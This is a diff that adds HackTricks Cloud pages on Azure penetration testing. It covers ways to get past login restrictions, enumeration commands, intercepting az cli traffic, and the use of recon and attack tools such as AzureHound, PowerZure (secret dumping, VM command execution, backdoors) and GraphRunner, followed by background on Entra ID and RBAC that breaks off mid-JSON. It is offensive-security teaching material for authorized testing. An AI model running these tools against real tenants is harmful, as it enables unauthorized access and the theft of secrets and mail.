+### SSRF
+
+If you found a SSRF in a machine inside Azure check this page for tricks:
+
+{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %}
+
+### Bypass Login Conditions
+
+<figure><img src="../../.gitbook/assets/image (268).png" alt=""><figcaption></figcaption></figure>
+
+In cases where you have some valid credentials but you cannot login, these are some common protections that could be in place:
+
+* **IP whitelisting** -- You need to compromise a valid IP
+* **Geo restrictions** -- Find where the user lives or where are the offices of the company and get a IP from the same city (or contry at least)
+* **Browser** -- Maybe only a browser from certain OS (Windows, Linux, Mac, Android, iOS) is allowed. Find out which OS the victim/company uses.
+* You can also try to **compromise Service Principal credentials** as they usually are less limited and its login is less reviewed
+
+After bypassing it, you might be able to get back to your initial setup and you will still have access.
+
+### Subdomain Takeover
+
+* [https://godiego.co/posts/STO-Azure/](https://godiego.co/posts/STO-Azure/)
+
+### Whoami
+
+{% hint style="danger" %}
+Learn **how to install** az cli, AzureAD and Az PowerShell in the [**Az - Entra ID**](az-services/az-azuread.md) section.
+{% endhint %}
+
+One of the first things you need to know is **who you are** (in which environment you are):
+
+{% tabs %}
+{% tab title="az cli" %}
+```bash
+az account list 
+az account tenant list # Current tenant info
+az account subscription list # Current subscription info
+az ad signed-in-user show # Current signed-in user
+az ad signed-in-user list-owned-objects # Get owned objects by current user
+az account management-group list #Not allowed by default
+```
+{% endtab %}
+
+{% tab title="AzureAD" %}
+```powershell
+#Get the current session state
+Get-AzureADCurrentSessionInfo
+#Get details of the current tenant
+Get-AzureADTenantDetail
+```
+{% endtab %}
+
+{% tab title="Az PowerShell" %}
+```powershell
+# Get the information about the current context (Account, Tenant, Subscription etc.)
+Get-AzContext
+# List all available contexts
+Get-AzContext -ListAvailable
+# Enumerate subscriptions accessible by the current user
+Get-AzSubscription
+#Get Resource group
+Get-AzResourceGroup
+# Enumerate all resources visible to the current user
+Get-AzResource
+# Enumerate all Azure RBAC role assignments
+Get-AzRoleAssignment # For all users
+Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com # For current user
+```
+{% endtab %}
+{% endtabs %}
+
+{% hint style="danger" %}
+Oone of the most important commands to enumerate Azure is **`Get-AzResource`** from Az PowerShell as it lets you **know the resources your current user has visibility over**.
+
+You can get the same info in the **web console** going to [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) or searching for "All resources"
+{% endhint %}
+
+### ENtra ID Enumeration
+
+By default, any user should have **enough permissions to enumerate** things such us, users, groups, roles, service principals... (check [default AzureAD permissions](az-basic-information/#default-user-permissions)).\
+You can find here a guide:
+
+{% content-ref url="az-services/az-azuread.md" %}
+[az-azuread.md](az-services/az-azuread.md)
+{% endcontent-ref %}
+
+{% hint style="info" %}
+Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\
+In the following section you can check some ways to **enumerate some common services.**
+{% endhint %}
+
+## App Service SCM
+
+Kudu console to log in to the App Service 'container'.
+
+## Webshell
+
+Use portal.azure.com and select the shell, or use shell.azure.com, for a bash or powershell. The 'disk' of this shell are stored as an image file in a storage-account.
+
+## Azure DevOps
+
+Azure DevOps is separate from Azure. It has repositories, pipelines (yaml or release), boards, wiki, and more. Variable Groups are used to store variable values and secrets.
+
+## Debug | MitM az cli
+
+Using the parameter **`--debug`** it's possible to see all the requests the tool **`az`** is sending:
+
+```bash
+az account management-group list --output table --debug
+```
+
+In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do:
+
+{% tabs %}
+{% tab title="Bash" %}
+```bash
+export ADAL_PYTHON_SSL_NO_VERIFY=1
+export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
+export HTTPS_PROXY="http://127.0.0.1:8080"
+export HTTP_PROXY="http://127.0.0.1:8080"
+
+# If this is not enough
+# Download the certificate from Burp and convert it into .pem format
+# And export the following env variable
+openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM
+export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem
+```
+{% endtab %}
+
+{% tab title="PS" %}
+```bash
+$env:ADAL_PYTHON_SSL_NO_VERIFY=1
+$env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
+$env:HTTPS_PROXY="http://127.0.0.1:8080"
+$env:HTTP_PROXY="http://127.0.0.1:8080"
+```
+{% endtab %}
+{% endtabs %}
+
+## Automated Recon Tools
+
+### [**ROADRecon**](https://github.com/dirkjanm/ROADtools)
+
+```powershell
+cd ROADTools
+pipenv shell
+roadrecon auth -u test@corp.onmicrosoft.com -p "Welcome2022!"
+roadrecon gather
+roadrecon gui
+```
+
+### [Monkey365](https://github.com/silverhack/monkey365)
+
+{% code overflow="wrap" %}
+```powershell
+Import-Module monkey365
+Get-Help Invoke-Monkey365
+Get-Help Invoke-Monkey365 -Detailed
+Invoke-Monkey365 -IncludeEntraID -ExportTo HTML -Verbose -Debug -InformationAction Continue
+Invoke-Monkey365 - Instance Azure -Analysis All -ExportTo HTML
+```
+{% endcode %}
+
+### [**Stormspotter**](https://github.com/Azure/Stormspotter)
+
+```powershell
+# Start Backend
+cd stormspotter\backend\
+pipenv shell
+python ssbackend.pyz
+
+# Start Front-end
+cd stormspotter\frontend\dist\spa\
+quasar.cmd serve -p 9091 --history
+
+# Run Stormcollector
+cd stormspotter\stormcollector\
+pipenv shell
+az login -u test@corp.onmicrosoft.com -p Welcome2022!
+python stormspotter\stormcollector\sscollector.pyz cli
+# This will generate a .zip file to upload in the frontend (127.0.0.1:9091)
+```
+
+### [**AzureHound**](https://github.com/BloodHoundAD/AzureHound)
+
+```powershell
+# You need to use the Az PowerShell and Azure AD modules:
+$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential ("test@corp.onmicrosoft.com", $passwd)
+Connect-AzAccount -Credential $creds
+
+Import-Module AzureAD\AzureAD.psd1
+Connect-AzureAD -Credential $creds
+
+# Launch AzureHound
+. AzureHound\AzureHound.ps1
+Invoke-AzureHound -Verbose
+
+# Simple queries
+## All Azure Users
+MATCH (n:AZUser) return n.name
+## All Azure Applications
+MATCH (n:AZApp) return n.objectid
+## All Azure Devices
+MATCH (n:AZDevice) return n.name
+## All Azure Groups
+MATCH (n:AZGroup) return n.name
+## All Azure Key Vaults
+MATCH (n:AZKeyVault) return n.name
+## All Azure Resource Groups
+MATCH (n:AZResourceGroup) return n.name
+## All Azure Service Principals
+MATCH (n:AZServicePrincipal) return n.objectid
+## All Azure Virtual Machines
+MATCH (n:AZVM) return n.name
+## All Principals with the ‘Contributor’ role
+MATCH p = (n)-[r:AZContributor]->(g) RETURN p
+
+# Advanced queries
+## Get Global Admins
+MATCH p =(n)-[r:AZGlobalAdmin*1..]->(m) RETURN p
+## Owners of Azure Groups
+MATCH p = (n)-[r:AZOwns]->(g:AZGroup) RETURN p
+## All Azure Users and their Groups
+MATCH p=(m:AZUser)-[r:MemberOf]->(n) WHERE NOT m.objectid CONTAINS 'S-1-5' RETURN p
+## Privileged Service Principals
+MATCH p = (g:AZServicePrincipal)-[r]->(n) RETURN p
+## Owners of Azure Applications
+MATCH p = (n)-[r:AZOwns]->(g:AZApp) RETURN p
+## Paths to VMs
+MATCH p = (n)-[r]->(g: AZVM) RETURN p
+## Paths to KeyVault
+MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p
+## Paths to Azure Resource Group
+MATCH p = (n)-[r]->(g:AZResourceGroup) RETURN p
+## On-Prem users with edges to Azure
+MATCH  p=(m:User)-[r:AZResetPassword|AZOwns|AZUserAccessAdministrator|AZContributor|AZAddMembers|AZGlobalAdmin|AZVMContributor|AZOwnsAZAvereContributor]->(n) WHERE m.objectid CONTAINS 'S-1-5-21' RETURN p
+## All Azure AD Groups that are synchronized with On-Premise AD
+MATCH (n:Group) WHERE n.objectid CONTAINS 'S-1-5' AND n.azsyncid IS NOT NULL RETURN n
+```
+
+### [Azucar](https://github.com/nccgroup/azucar)
+
+```bash
+# You should use an account with at least read-permission on the assets you want to access
+git clone https://github.com/nccgroup/azucar.git
+PS> Get-ChildItem -Recurse c:\Azucar_V10 | Unblock-File
+
+PS> .\Azucar.ps1 -AuthMode UseCachedCredentials -Verbose -WriteLog -Debug -ExportTo PRINT
+PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000
+PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -CertFilePassword MySuperP@ssw0rd! -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000
+
+# resolve the TenantID for an specific username
+PS> .\Azucar.ps1 -ResolveTenantUserName user@company.com
+```
+
+### [**MicroBurst**](https://github.com/NetSPI/MicroBurst)
+
+```
+Import-Module .\MicroBurst.psm1
+Import-Module .\Get-AzureDomainInfo.ps1
+Get-AzureDomainInfo -folder MicroBurst -Verbose
+```
+
+### [**PowerZure**](https://github.com/hausec/PowerZure)
+
+```powershell
+Connect-AzAccount
+ipmo C:\Path\To\Powerzure.psd1
+Get-AzureTarget
+
+# Reader
+$ Get-Runbook, Get-AllUsers, Get-Apps, Get-Resources, Get-WebApps, Get-WebAppDetails
+
+# Contributor
+$ Execute-Command -OS Windows -VM Win10Test -ResourceGroup Test-RG -Command "whoami"
+$ Execute-MSBuild -VM Win10Test  -ResourceGroup Test-RG -File "build.xml"
+$ Get-AllSecrets # AllAppSecrets, AllKeyVaultContents
+$ Get-AvailableVMDisks, Get-VMDisk # Download a virtual machine's disk
+
+# Owner
+$ Set-Role -Role Contributor -User test@contoso.com -Resource Win10VMTest
+
+# Administrator
+$ Create-Backdoor, Execute-Backdoor
+```
+
+### [**GraphRunner**](https://github.com/dafthack/GraphRunner/wiki/Invoke%E2%80%90GraphRunner)
+
+```powershell
+
+#Get-GraphTokens
+#A good place to start is to authenticate with the Get-GraphTokens module. This module will launch a device-code login, allowing you to authenticate the session from a browser session. Access and refresh tokens will be written to the global $tokens variable. To use them with other GraphRunner modules use the Tokens flag (Example. Invoke-DumpApps -Tokens $tokens)
+Import-Module .\GraphRunner.ps1
+Get-GraphTokens
+
+#Invoke-GraphRecon
+#This module gathers information about the tenant including the primary contact info, directory sync settings, and user settings such as if users have the ability to create apps, create groups, or consent to apps.
+Invoke-GraphRecon -Tokens $tokens -PermissionEnum
+
+#Invoke-DumpCAPS
+#A module to dump conditional access policies from a tenant.
+Invoke-GraphRecon -Tokens $tokens -PermissionEnum
+
+#Invoke-DumpCAPS
+#A module to dump conditional access policies from a tenant.
+Invoke-DumpCAPS -Tokens $tokens -ResolveGuids
+
+#Invoke-DumpApps
+#This module helps identify malicious app registrations. It will dump a list of Azure app registrations from the tenant including permission scopes and users that have consented to the apps. Additionally, it will list external apps that are not owned by the current tenant or by Microsoft's main app tenant. This is a good way to find third-party external apps that users may have consented to.
+Invoke-DumpApps -Tokens $tokens
+
+#Get-AzureADUsers
+#Gather the full list of users from the directory.
+Get-AzureADUsers -Tokens $tokens -OutFile users.txt
+
+#Get-SecurityGroups
+#Create a list of security groups along with their members.
+Get-SecurityGroups -AccessToken $tokens.access_token
+
+G#et-UpdatableGroups
+#Gets groups that may be able to be modified by the current user
+Get-UpdatableGroups -Tokens $tokens
+
+#Get-DynamicGroups
+#Finds dynamic groups and displays membership rules
+Get-DynamicGroups -Tokens $tokens
+
+#Get-SharePointSiteURLs
+#Gets a list of SharePoint site URLs visible to the current user
+Get-SharePointSiteURLs -Tokens $tokens
+
+#Invoke-GraphOpenInboxFinder
+#This module attempts to locate mailboxes in a tenant that have allowed other users to read them. By providing a userlist the module will attempt to access the inbox of each user and display if it was successful. The access token needs to be scoped to Mail.Read.Shared or Mail.ReadWrite.Shared for this to work.
+Invoke-GraphOpenInboxFinder -Tokens $tokens -Userlist users.txt
+
+#Get-TenantID
+#This module attempts to gather a tenant ID associated with a domain.
+Get-TenantID -Domain 
+
+#Invoke-GraphRunner
+#Runs Invoke-GraphRecon, Get-AzureADUsers, Get-SecurityGroups, Invoke-DumpCAPS, Invoke-DumpApps, and then uses the default_detectors.json file to search with Invoke-SearchMailbox, Invoke-SearchSharePointAndOneDrive, and Invoke-SearchTeams.
+Invoke-GraphRunner -Tokens $tokens
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-basic-information/README.md b/pentesting-cloud/azure-security/az-basic-information/README.md
new file mode 100644
index 0000000000..003c4ae03e
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-basic-information/README.md
@@ -0,0 +1,414 @@
+# Az - Basic Information
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Organization Hierarchy
+
+<figure><img src="https://lh7-rt.googleusercontent.com/slidesz/AGV_vUcVrh1BpuQXN7RzGqoxrn-4Nm_sjdJU-dDTvshloB7UMQnN1mtH9N94zNiPCzOYAqE9EsJqlboZOj47tQsQktjxszpKvIDPZLs9rgyiObcZCvl7N0ZWztshR0ZddyBYZIAwPIkrEQ=s2048?key=l3Eei079oPmVJuh8lxQYxxrB" alt=""><figcaption><p><a href="https://www.tunecom.be/stg_ba12f/wp-content/uploads/2020/01/VDC-Governance-ManagementGroups-1536x716.png">https://www.tunecom.be/stg_ba12f/wp-content/uploads/2020/01/VDC-Governance-ManagementGroups-1536x716.png</a></p></figcaption></figure>
+
+### Management Groups
+
+* It can contain **other management groups or subscriptions**.
+* This allows to **apply governance controls** such as RBAC and Azure Policy once at the management group level and have them **inherited** by all the subscriptions in the group.
+* **10,000 management** groups can be supported in a single directory.
+* A management group tree can support **up to six levels of depth**. This limit doesn’t include the root level or the subscription level.
+* Each management group and subscription can support **only one parent**.
+* Even if several management groups can be created **there is only 1 root management group**.
+  * The root management group **contains** all the **other management groups and subscriptions** and **cannot be moved or deleted**.
+* All subscriptions within a single management group must trust the **same Entra ID tenant.**
+
+<figure><img src="../../../.gitbook/assets/image (147).png" alt=""><figcaption><p><a href="https://td-mainsite-cdn.tutorialsdojo.com/wp-content/uploads/2023/02/managementgroups-768x474.png">https://td-mainsite-cdn.tutorialsdojo.com/wp-content/uploads/2023/02/managementgroups-768x474.png</a></p></figcaption></figure>
+
+### Azure Subscriptions
+
+* It’s another **logical container where resources** (VMs, DBs…) can be run and will be billed.
+* Its **parent** is always a **management group** (and it can be the root management group) as subscriptions cannot contain other subscriptions.
+* It **trust only one Entra ID** directory
+* **Permissions** applied at the subscription level (or any of its parents) are **inherited** to all the resources inside the subscription
+
+### Resource Groups
+
+[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-python?tabs=macos#what-is-a-resource-group) A resource group is a **container** that holds **related resources** for an Azure solution. The resource group can include all the resources for the solution, or only those **resources that you want to manage as a group**. Generally, add **resources** that share the **same lifecycle** to the same resource group so you can easily deploy, update, and delete them as a group.
+
+All the **resources** must be **inside a resource group** and can belong only to a group and if a resource group is deleted, all the resources inside it are also deleted.
+
+<figure><img src="https://lh7-rt.googleusercontent.com/slidesz/AGV_vUfe8U30iP_vdZCvxX4g8nEPRLoo7v0kmCGkDn1frBPn3_GIoZ7VT2LkdsVQWCnrG_HSYNRRPM-1pSECUkbDAB-9YbUYLzpvKVLDETZS81CHWKYM4fDl3oMo5-yvTMnjdLTS2pz8U67xUTIzBhZ25MFMRkq5koKY=s2048?key=gSyKQr3HTyhvHa28Rf7LVA" alt=""><figcaption><p><a href="https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&#x26;ssl=1">https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&#x26;ssl=1</a></p></figcaption></figure>
+
+### Azure Resource IDs
+
+Every resource in Azure has an Azure Resource ID that identifies it.
+
+The format of an Azure Resource ID is as follows:
+
+* `/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}`
+
+For a virtual machine named myVM in a resource group `myResourceGroup` under subscription ID `12345678-1234-1234-1234-123456789012`, the Azure Resource ID looks like this:
+
+* `/subscriptions/12345678-1234-1234-1234-123456789012/resourceGroups/myResourceGroup/providers/Microsoft.Compute/virtualMachines/myVM`
+
+## Azure vs Entra ID vs Azure AD Domain Services
+
+### Azure
+
+Azure is Microsoft’s comprehensive **cloud computing platform, offering a wide range of services**, including virtual machines, databases, artificial intelligence, and storage. It acts as the foundation for hosting and managing applications, building scalable infrastructures, and running modern workloads in the cloud. Azure provides tools for developers and IT professionals to create, deploy, and manage applications and services seamlessly, catering to a variety of needs from startups to large enterprises.
+
+### Entra ID (formerly Azure Active Directory)
+
+Entra ID is a cloud-based **identity and access management servic**e designed to handle authentication, authorization, and user access control. It powers secure access to Microsoft services such as Office 365, Azure, and many third-party SaaS applications. With features like single sign-on (SSO), multi-factor authentication (MFA), and conditional access policies among others.
+
+### Entra Domain Services (formerly Azure AD DS)
+
+Entra Domain Services extends the capabilities of Entra ID by offering **managed domain services compatible with traditional Windows Active Directory environments**. It supports legacy protocols such as LDAP, Kerberos, and NTLM, allowing organizations to migrate or run older applications in the cloud without deploying on-premises domain controllers. This service also supports Group Policy for centralized management, making it suitable for scenarios where legacy or AD-based workloads need to coexist with modern cloud environments.
+
+## Entra ID Principals
+
+### Users
+
+* **New users**
+  * Indicate email name and domain from selected tenant
+  * Indicate Display name
+  * Indicate password
+  * Indicate properties (first name, job title, contact info…)
+    * Default user type is “**member**”
+* **External users**
+  * Indicate email to invite and display name (can be a non Microsft email)
+  * Indicate properties
+    * Default user type is “**Guest**”
+
+### Members & Guests Default Permissions
+
+You can check them in [https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions) but among other actions a member will be able to:
+
+* Read all users, Groups, Applications, Devices, Roles, Subscriptions, and their public properties
+* Invite Guests (_can be turned off_)
+* Create Security groups
+* Read non-hidden Group memberships
+* Add guests to Owned groups
+* Create new application (_can be turned off_)
+* Add up to 50 devices to Azure (_can be turned off_)
+
+{% hint style="info" %}
+Remember that to enumerate Azure resources the user needs an explicit grant of the permission.
+{% endhint %}
+
+### Users Default Configurable Permissions
+
+* **Members (**[**docs**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)**
+  * Register Applications: Default **Yes**
+  * Restrict non-admin users from creating tenants: Default **No**
+  * Create security groups: Default **Yes**
+  * Restrict access to Microsoft Entra administration portal: Default **No**
+    * This doesn’t restrict API access to the portal (only web)
+  * Allow users to connect work or school account with LinkedIn: Default **Yes**
+  * Show keep user signed in: Default **Yes**
+  * Restrict users from recovering the BitLocker key(s) for their owned devices: Default No (check in Device Settings)
+  * Read other users: Default **Yes** (via Microsoft Graph)
+* **Guests**
+  * **Guest user access restrictions**
+    * **Guest users have the same access as members** grants all member user permissions to guest users by default.
+    * **Guest users have limited access to properties and memberships of directory objects (default)** restricts guest access to only their own user profile by default. Access to other users and group information is no longer allowed.
+    * **Guest user access is restricted to properties and memberships of their own directory objects** is the most restrictive one.
+  * **Guests can invite**
+    * **Anyone in the organization can invite guest users including guests and non-admins (most inclusive) - Default**
+    * **Member users and users assigned to specific admin roles can invite guest users including guests with member permissions**
+    * **Only users assigned to specific admin roles can invite guest users**
+    * **No one in the organization can invite guest users including admins (most restrictive)**
+  * **External user leave**: Default **True**
+    * Allow external users to leave the organization
+
+{% hint style="success" %}
+Even if restricted by default, users (members and guests) with granted permissions could perform the previous actions.
+{% endhint %}
+
+### **Groups**
+
+There are **2 types of groups**:
+
+* **Security**: This type of group is used to give members access to aplications, resources and assign licenses. Users, devices, service principals and other groups an be members.
+* **Microsoft 365**: This type of group is used for collaboration, giving members access to a shared mailbox, calendar, files, SharePoint site, and so on. Group members can only be users.
+  * This will have an **email address** with the domain of the EntraID tenant.
+
+There are **2 types of memberships**:
+
+* **Assigned**: Allow to manually add specific members to a group.
+* **Dynamic membership**: Automatically manages membership using rules, updating group inclusion when members attributes change.
+
+### **Service Principals**
+
+A **Service Principal** is an **identity** created for **use** with **applications**, hosted services, and automated tools to access Azure resources. This access is **restricted by the roles assigned** to the service principal, giving you control over **which resources can be accessed** and at which level. For security reasons, it's always recommended to **use service principals with automated tools** rather than allowing them to log in with a user identity.
+
+It's possible to **directly login as a service principal** by generating it a **secret** (password), a **certificate**, or granting **federated** access to third party platforms (e.g. Github Actions) over it.
+
+* If you choose **password** auth (by default), **save the password generated** as you won't be able to access it again.
+* If you choose certificate authentication, make sure the **application will have access over the private key**.
+
+### App Registrations
+
+An **App Registration** is a configuration that allows an application to integrate with Entra ID and to perform actions.
+
+#### Key Components:
+
+1. **Application ID (Client ID):** A unique identifier for your app in Azure AD.
+2. **Redirect URIs:** URLs where Azure AD sends authentication responses.
+3. **Certificates, Secrets & Federated Credentials:** It's possible to generate a secret or a certificate to login as the service principal of the application, or to grant federated access to it (e.g. Github Actions).&#x20;
+   1. If a **certificate** or **secret** is generated, it's possible to a person to **login as the service principal** with CLI tools by knowing the **application ID**, the **secret** or **certificate** and the **tenant** (domain or ID).
+4. **API Permissions:** Specifies what resources or APIs the app can access.
+5. **Authentication Settings:** Defines the app's supported authentication flows (e.g., OAuth2, OpenID Connect).
+6. **Service Principal**: A service principal is created when an App is created (if it's done from the web console) or when it's installed in a new tenant.
+   1. The **service principal** will get all the requested permissions it was configured with.
+
+### Default Consent Permissions
+
+**User consent for applications**
+
+* **Do not allow user consent**
+  * An administrator will be required for all apps.
+* **Allow user consent for apps from verified publishers, for selected permissions (Recommended)**
+  * All users can consent for permissions classified as "low impact", for apps from verified publishers or apps registered in this organization.
+  * **Default** low impact permissions (although you need to accept to add them as low):
+    * User.Read - sign in and read user profile
+    * offline\_access - maintain access to data that users have given it access to
+    * openid - sign users in
+    * profile - view user's basic profile
+    * email - view user's email address
+* **Allow user consent for apps (Default)**
+  * All users can consent for any app to access the organization's data.
+
+**Admin consent requests**: Default **No**
+
+* Users can request admin consent to apps they are unable to consent to
+* If **Yes**: It’s possible to indicate Users, Groups and Roles that can consent requests
+  * Configure also if users will receive email notifications and expiration reminders&#x20;
+
+### **Managed Identity (Metadata)**
+
+Managed identities in Azure Active Directory offer a solution for **automatically managing the identity** of applications. These identities are used by applications for the purpose of **connecting** to **resources** compatible with Azure Active Directory (**Azure AD**) authentication. This allows to **remove the need of hardcoding cloud credentials** in the code as the application will be able to contact the **metadata** service to get a valid token to **perform actions** as the indicated managed identity in Azure.
+
+There are two types of managed identities:
+
+* **System-assigned**. Some Azure services allow you to **enable a managed identity directly on a service instance**. When you enable a system-assigned managed identity, a **service principal** is created in the Entra ID tenant trusted by the subscription where the resource is located. When the **resource** is **deleted**, Azure automatically **deletes** the **identity** for you.
+* **User-assigned**. It's also possible for users to generate managed identities. These are created inside a resource group inside a subscription and a service principal will be created in the EntraID trusted by the subscription. Then, you can assign the managed identity to one or **more instances** of an Azure service (multiple resources). For user-assigned managed identities, the **identity is managed separately from the resources that use it**.
+
+Managed Identities **don't generate eternal credentials** (like passwords or certificates) to access as the service principal attached to it.
+
+### Enterprise Applications
+
+It’s just a **table in Azure to filter service principals** and check the applications that have been assigned to.
+
+**It isn’t another type of “application”,** there isn’t any object in Azure that is an “Enterprise Application”, it’s just an abstraction to check the Service principals, App registrations and managed identities.
+
+### Administrative Units
+
+Administrative units allows to **give permissions from a role over a specific portion of an organization**.
+
+Example:
+
+* Scenario: A company wants regional IT admins to manage only the users in their own region.
+* Implementation:
+  * Create Administrative Units for each region (e.g., "North America AU", "Europe AU").
+    * Populate AUs with users from their respective regions.
+      * AUs can **contain users, groups, or devices**
+      * AUs support **dynamic memberships**
+      * AUs **cannot contain AUs**
+    * Assign Admin Roles:
+      * Grant the "User Administrator" role to regional IT staff, scoped to their region's AU.
+* Outcome: Regional IT admins can manage user accounts within their region without affecting other regions.
+
+### Entra ID Roles
+
+* In order to manage Entra ID there are some **built-in roles** that can be assigned to Entra ID principals to manage Entra ID
+  * Check the roles in [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference)
+* The most privileged role is **Global Administrator**
+* In the Description of the role it’s possible to see its **granular permissions**
+
+## Roles & Permissions
+
+**Roles** are **assigned** to **principals** on a **scope**: `principal -[HAS ROLE]->(scope)`
+
+**Roles** assigned to **groups** are **inherited** by all the **members** of the group.
+
+Depending on the scope the role was assigned to, the **role** cold be **inherited** to **other resources** inside the scope container. For example, if a user A has a **role on the subscription**, he will have that **role on all the resource groups** inside the subscription and on **all the resources** inside the resource group.
+
+### **Classic Roles**
+
+| **Owner**                     | <ul><li>Full access to all resources</li><li>Can manage access for other users</li></ul> | All resource types |
+| ----------------------------- | ---------------------------------------------------------------------------------------- | ------------------ |
+| **Contributor**               | <ul><li>Full access to all resources</li><li>Cannot manage access</li></ul>              | All resource types |
+| **Reader**                    | • View all resources                                                                     | All resource types |
+| **User Access Administrator** | <ul><li>View all resources</li><li>Can manage access for other users</li></ul>           | All resource types |
+
+### Built-In roles
+
+[From the docs: ](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles)[Azure role-based access control (Azure RBAC)](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview) has several Azure **built-in roles** that you can **assign** to **users, groups, service principals, and managed identities**. Role assignments are the way you control **access to Azure resources**. If the built-in roles don't meet the specific needs of your organization, you can create your own [**Azure custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)**.**
+
+**Built-In** roles apply only to the **resources** they are **meant** to, for example check this 2 examples of **Built-In roles over Compute** resources:
+
+| [Disk Backup Reader](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#disk-backup-reader)                 | Provides permission to backup vault to perform disk backup.      | 3e5e47e6-65f7-47ef-90b5-e5dd4d455f24 |
+| ----------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------- | ------------------------------------ |
+| [Virtual Machine User Login](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-user-login) | View Virtual Machines in the portal and login as a regular user. | fb879df8-f326-4884-b1cf-06f3ad86be52 |
+
+This roles can **also be assigned over logic containers** (such as management groups, subscriptions and resource groups) and the principals affected will have them **over the resources inside those containers**.
+
+* Find here a list with [**all the Azure built-in roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles).
+* Find here a list with [**all the Entra ID built-in roles**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference).
+
+### Custom Roles
+
+* It’s also possible to create [**custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)
+* They are created inside a scope, although a role can be in several scopes (management groups, subscription and resource groups)
+* It’s possible to configure all the granular permissions the custom role will have
+* It’s possible to exclude permissions
+  * A principal with a excluded permission won’t be able to use it even if the permissions is being granted elsewhere
+* It’s possible to use wildcards
+* The used format is a JSON
+  * `actions` are for control actions over the resource
+  * `dataActions` are permissions over the data within the object
+
+Example of permissions JSON for a custom role:
+
+```json
+{
+    "properties": {
+        "roleName": "",
+        "description": "",
+        "assignableScopes": [
+            "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"
+        ],
+        "permissions": [
+            {
+                "actions": [
+                    "Microsoft.DigitalTwins/register/action",
+                    "Microsoft.DigitalTwins/unregister/action",
